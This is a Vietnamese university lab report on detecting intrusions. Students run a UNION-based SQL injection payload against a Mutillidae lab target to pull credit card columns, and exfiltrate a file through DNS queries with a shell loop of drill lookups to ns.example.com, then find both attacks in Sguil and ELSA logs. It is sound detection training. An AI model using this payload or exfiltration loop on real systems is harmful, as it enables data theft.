Trường Đại học Công nghệ Thông tin (UIT)

BÁO CÁO BÀI TẬP

Môn học: Hệ thống tìm kiếm, phát hiện và ngăn ngừa xâm nhập
Lab 1: Phân tích gói tin
GVHD: Đỗ Hoàng Hiển
1. THÔNG TIN CHUNG:
(Liệt kê tất cả các thành viên trong nhóm)
Lớp: NT204.O21.ATCL
STT Họ và tên MSSV Email
1 Nguyễn Hữu Tiến 21520479 21520479@gm.uit.edu.vn
2 Trần Thành Lợi 21522296 21522296@gm.uit.edu.vn

2. NỘI DUNG THỰC HIỆN:1

STT Công việc Kết quả tự đánh giá
1 6 yêu cầu 100%

Phần bên dưới của báo cáo này là tài liệu báo cáo chi tiết của nhóm thực hiện.

1
Ghi nội dung công việc, các kịch bản trong bài Thực hành
 Lab 1: Tổng quan các lỗ hổng web thường gặp

2
BÁO CÁO CHI TIẾT
Yêu cầu 1: Truy cập và các máy ảo và thực hiện kiếm trà kết nối giữa các máy theọ
yêu cầu bên dưới. Chụp hình kết quả.
• Truy cập vào máy CyberOps Workstation VM và Metasploitable.
-Trên máy Metasploitable: Thực hiện câu lệnh “ifconfig” để có được ip của máy.
-Trên máy CyberOps Workstation VM : Thực hiện câu lệnh “ping
209.165.200.235”.

Hình 1: Ping CyberOps Workstation VM và Metasploitable.

• Truy cập vào máy Kali và Metasploitable.
-Trên máy Kali: Thực hiện câu lệnh “ping 209.165.200.235”.

BỘ MÔN Báo cáo môn học

AN TOÀN THÔNG TIN HỌC KỲ 2 – NĂM HỌC 2023-2024
 Lab 1: Tổng quan các lỗ hổng web thường gặp

3
Hình 2: Ping Kali và Metasploitable.

• Truy cập vào máy Kali và CyberOps Workstation.

-Trên máy Kali: Thực hiện câu lệnh “ping 192.168.0.11”.

Hình 3: Ping Kali và CyberOps Workstation VM.

B.2 Bắt và phân tích gói tin tấn công SQL Injection

BỘ MÔN Báo cáo môn học

AN TOÀN THÔNG TIN HỌC KỲ 2 – NĂM HỌC 2023-2024
 Lab 1: Tổng quan các lỗ hổng web thường gặp

4
Bước 1. Khởi động chương trình bắt gói tin
Truy cập vào máy Security Onion, sử dụng công cụ Sguil với các interface: seconion-
eth0, seconion-eth1, seconion-eth2.

Hình 4: Sử dụng công cụ Sguil.

Hình 5: Chạy Sguil với 3 interface.

Bước 2. Thực hiện tấn công SQL Injection
Truy cập đường dẫn “http://209.165.200.235/mutillidae” ở máy Kali và tiến hành
thực hiện SQL Injection bằng câu truy vấn:
' union select ccid,ccnumber,ccv,expiration,null from credit_cards -- -
Được nhập vào textbox ở phần đăng nhập và nhận được kết quả sau khi đã submit.

BỘ MÔN Báo cáo môn học

AN TOÀN THÔNG TIN HỌC KỲ 2 – NĂM HỌC 2023-2024
 Lab 1: Tổng quan các lỗ hổng web thường gặp

5
Hình 6: Thực hiện SQL Injection.

Hình 7: Kết quả sau khi thực hiện SQL Injection.

B.3 Xem thông tin log trên công cụ Sguil
Yêu cầu 2.2. Sinh viên hãy tìm trên Sguil những cảnh báọ có chứà thông tin liên quan
đến tấn công SQL Injectiọn đã thực hiện (payload tấn công, kết quả trả về…). Chụp lại
các hình ảnh kết quả cho từng bước.

BỘ MÔN Báo cáo môn học

AN TOÀN THÔNG TIN HỌC KỲ 2 – NĂM HỌC 2023-2024
 Lab 1: Tổng quan các lỗ hổng web thường gặp

6
Sử dụng Sguil để tìm cảnh báo liên quan đến ET WEB_SERVER Possible SQL Injection
Attempt UNION SELECT. Và thực hiện phân tích gói tin liên quan tới sự kiện SQL
Injection, ta có kết quả là Payload của cuộc tấn công bằng cách dùng option Transcript
hoặc Wireshark để phân tích gói tin.

Hình 8: Dùng Sguil để tìm và phân tích gói tin.

Hình 9: Phân tích gói tin với option Transcript.

BỘ MÔN Báo cáo môn học

AN TOÀN THÔNG TIN HỌC KỲ 2 – NĂM HỌC 2023-2024
 Lab 1: Tổng quan các lỗ hổng web thường gặp

7
Hình 10: Phân tích gói tin với option Wireshark.
B.3 Xem thông tin log trên công cụ ELSA
Yêu cầu 2.3. Sinh viên hãy tìm trên ELSA những sự kiện có thông tin liên quan đến tấn
công SQL Injectiọn đã thực hiện (payload tấn công, kết quả trả về…). Chụp lại các hình
ảnh kết quả cho từng bước.
Trên ELSA thực hiện tìm những sự kiện có thông tin liên quan đến cuộc tấn công bằng
cách xem các gói tin tại mục HTTP có liên quan tới SQL Injection.

Hình 11: Sử dụng ELSA để phân tích.

BỘ MÔN Báo cáo môn học

AN TOÀN THÔNG TIN HỌC KỲ 2 – NĂM HỌC 2023-2024
 Lab 1: Tổng quan các lỗ hổng web thường gặp

8
Hình 12: Tìm các gói tin liên quan tới SQL Injection.
Sử dụng plugin getPcap, ta nhận được thông tin dạng pcap script được gửi về và có
được Payload của kẻ tấn công. Thông tin gói tin và Payload có được tương tự với thông
tin được bắt bằng Sguil.

Hình 13: Gói tin có được sau khi sử dụng plugin getPcap.
B.3 Bắt và phân tích gói tin trong tấn công lấy dữ liệu với DNS

BỘ MÔN Báo cáo môn học

AN TOÀN THÔNG TIN HỌC KỲ 2 – NĂM HỌC 2023-2024
 Lab 1: Tổng quan các lỗ hổng web thường gặp

9
Yêu cầu 3.1. Thực hiện và báo cáo kết quả các bựớc tấn công lấy dữ liệu thông qua
DNS nhự hựớng dẫn. Minh chứng nội dung lấy được sau khi hoàn tất tấn công (file
secret.txt)? Chụp lại các hình ảnh kết quả cho từng bước.
Bước 1. Thực hiện lấy dữ liệu thông qua DNS
• Kiểm tra cấu hình DNS server trên máy CyberOps:
Mở file /etc/resolv.conf ta địa chỉ IP của DNS Server là của máy Metaploitable
209.165.200.235

Hình 14: Kiểm tra cấu hình máy CyberOps.

• Chuyển file confidential.txt sang dạng file hexan:

Sử dụng lệnh xxd để chuyển nội dung củà cọnfidential.txt sang dạng những
chuỗi hexan 60 bytes và lưu vàọ 1 file mới có tên confidential.hex ta được kết
quả.

BỘ MÔN Báo cáo môn học

AN TOÀN THÔNG TIN HỌC KỲ 2 – NĂM HỌC 2023-2024
 Lab 1: Tổng quan các lỗ hổng web thường gặp

10
Hình 15: Chuyến file confidential.txt sang dạng file hexan.
• Nối nội dung hexan đã chuyển vào log truy vấn của DNS
Ta sử dụng đoạn shell script “for line in `cat confidential.hex` ; do drill
$line.ns.example.com; done”. Đoạn shell script truy vấn URL tạo ra từ từng dòng
hexan trong confidential.hex

Hình 16: Shell script nối nội dung hexan đã chuyển vào log truy vấn của DNS.
Câu hỏi: Sinh viên có thể tạo ra bao nhiêu URL như vậy từ file cọnfidential.hex?
Ta có thể tạo ra 4 URL như vậy từ file confidential.hex vì câu lệnh chèn được sử dụng là
câu lệnh lặp với mỗi dòng trong file hex sẽ được chèn và tạo ra 1 URL.

BỘ MÔN Báo cáo môn học

AN TOÀN THÔNG TIN HỌC KỲ 2 – NĂM HỌC 2023-2024
 Lab 1: Tổng quan các lỗ hổng web thường gặp

11
• Lấy DNS log từ xa
Từ máy Kali, kết nối SSH đến Metasploitable (DNS server) và thực hiện đọc dữ liệu
từ file /var/lib/bind/query.log trên máy Metasploitable bằng session SSH đã khởi
tạo từ máy Kali và lọc rà các thông tin sẽ là nội dung hexan của file confidential.hex

Hình 17: Kết nối SSH đến máy Metasploitable.

Hình 18: Đọc dữ liệu từ file trên máy Metaploitable.

BỘ MÔN Báo cáo môn học

AN TOÀN THÔNG TIN HỌC KỲ 2 – NĂM HỌC 2023-2024
 Lab 1: Tổng quan các lỗ hổng web thường gặp

12
Ta có kết quả đọc đựợc sẽ nằm trong file secret.hex. Thoát khỏi sessiọn SSH và sử dụng
câu lệnh scp để sao chép file secret.hex từ máy Metaspoitable sang máy Kali.

Hình 19: Sao chép file secret.hex đến máy Kali.

Sử dụng lại câu lệnh xxd với ọptiọn -r -p để chuỳển nội dung dạng hex về dạng text. Sau
đó đọc nội dung file.

Hình 20: Nội dung file secret.txt

Bước 2. Xem log trên ELSA
Yêu cầu 3.2. Sinh viên thực hiện lấy thông tin liên quan đến tấn công lấy dữ liệu qua
DNS trên công cụ ELSA, giải giải mã đoạn hex và so sánh với nội dung lấy đựợc sau khi
tấn công ở Yêu cầu 3.1?

BỘ MÔN Báo cáo môn học

AN TOÀN THÔNG TIN HỌC KỲ 2 – NĂM HỌC 2023-2024
 Lab 1: Tổng quan các lỗ hổng web thường gặp

13
Ở menu bên trái và chọn DNS > Bottom Requests để hiện danh sách request DNS theọ
thứ tự ít xuất hiện nhất. Sau đó tìm các entry có dạng ns.example.com bắt đầu bằng
chuỗi hexan. Ta thu được 4 entry bắt đầu bằng chuỗi hexan như hình dưới.

Hình 21: Các entry có dạng ns.example.com bắt đầu bằng chuỗi hexan.
Sau khi thu thập các chuỗi hexan đáng ngờ ta sử dụng xxd để đưa dữ liệu về dạng
chuỗi. Ta có được nội dung của dữ liệu giống với nội dung lấy được sau khi tấn công ở
yêu cầu 3.1.

Hình 22: Nội dung dữ liệu lấy được khi tấn công.

HẾT

BỘ MÔN Báo cáo môn học

AN TOÀN THÔNG TIN HỌC KỲ 2 – NĂM HỌC 2023-2024